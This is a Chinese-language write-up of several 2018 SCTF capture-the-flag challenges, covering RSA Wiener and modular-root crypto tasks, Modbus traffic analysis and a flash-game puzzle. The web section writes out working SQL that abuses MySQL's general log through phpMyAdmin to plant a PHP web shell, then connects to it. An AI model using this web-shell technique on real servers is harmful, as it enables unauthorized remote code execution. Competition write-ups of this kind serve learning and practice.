弱弱的web狗表示简直就没有活路....
Web
easiest web-phpmyadmin
参考这篇:地址
执行以下sql语句:
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php';
SELECT '<?php assert($_POST["cmd"]);?>'
用菜刀连一下:
成功,找目录里文件,C盘有个flag.txt:
Crypto
it may contain flag
题目简单粗暴直接给了RSA的n,e,c 首先尝试一波分解n,分解出n此题就结束了
http://factordb/ 尝试分解,无果。
观察这个e竟然这么大,那就可能存在低解密指数攻击。 具体请参考这篇文章:https://www.anquanke/post/id/84632
这篇总结CTF中RSA攻击姿势很全面。
尝试低解密指数攻击,直接用Github上的源码跑就行(运行RSAwienerHacker.py就行,调用hack_RSA方法)
发现跑出了私钥d,所以直接解密就完了:
c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3
d=731297
n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf
m=pow(c,d,n)
print 'SCTF{'+hex(m)[2:len(hex(m))-1].decode('hex')+'}'
得到flag:
A Number Problem
更加简单粗暴 题目两行:
x**33=1926041757553905692219721422025224638913707 mod 3436415358139016629092568198745009225773259 tell me the smallest answer of x
解方程,解出x应该flag就出来了。
看到这个题,第一反应又考了一个RSA?
分解一波N发现可以分解,计算(p-1)*(q-1),然后计算私钥发现不对... e与n的欧拉值不互素,RSA条件不满足
不死心 想到今年HUMEN CTF有一道题也是不互素情况,直接拿11当e去算私钥最后结果开三次方,拿到结果美滋滋去交....
各种姿势交都不对....
把结果代入题目,发现根本就不对。。。
找问题 发现了开3次方失败了,也就是说不能正好开出三次方,这是近似值。
死心了 看来不是RSA
此时看题 才发现让我学习数论.... 粗心走的弯路啊
学数论解方程emmmmm(不适合小白)走一波工具 使用mathematica尝试求解
命令: solve[x^33==1926041757553905692219721422025224638913707,{x},Modulus->3436415358139016629092568198745009225773259]
解出x:(2333又偷出了一道题)
最小的结果是flag,将x转为字符串发现是乱码,直接交SCTF{x}就过了。
早点想起mathematics没准还能拿个前三2333(逃... 数论大佬别打我)
MISC
签到:
考手速。万年单身狗手速还是不行.... 感觉很快了还是才第十 严重怀疑前几是不是脚本跑的2333
神奇的ModBus:
流量分析,题目说modbus,查一下发现是个协议。流量包中有这个协议的流量,直接wireshark筛选出了modbus协议的包
追踪TCP流,发现整个TCP流都充斥着这个flag:
sctf{Easy_Mdbus} 直接去交发现不行
换了各种姿势 大小写 、点都试过了交了一万遍flag都不行mmp
简直了 还能有假flag
研究了一会Modbus协议 盯着流量包盯了半天感觉什么东西都分析不出来了。。。
晚上吃过饭再交一下上面的flag成了.... 真是mmp 不知道题目平台验证flag的程序出了bug还是我有毒(心中cnm在奔腾)
肥宅快乐题:
开始打游戏... 是个flash 播放器打开能跳关的 既然通关就给flag那就快进到最后 发现对话里并没有flag
从头到尾跳帧翻 还是没有...
然后队里一个大佬翻到了flag2333(我有毒) 请教了发现md我的播放器有毒(辣鸡迅雷影音)平时不咋用电脑看视频的痛
换个Potplayer 翻到差不多57帧的时候 出现这个动画:
一直点击对话就得到了flag:
见识了见识了...
总结:
web完全做不动...
建议板那道XSS成功弹框不知道干啥了.. 打cookie发现没有东西,有师傅发了wp才发现自己才踏出万里长征的第一步...
misc侧信道和神秘的交易 都是新知识 看来快速学习能力太差了...
Crypto 那道ELGamal 密码学刚讲这个 不知道有什么攻击姿势 感觉应该是同一flag用不同随机数加密了两次 把两对c1,c2给出了 但是不会用...
还是只会偷题的小白....坐等大手子各师傅们的wp学习一波...
更多推荐
2018 SCTF 部分wp
发布评论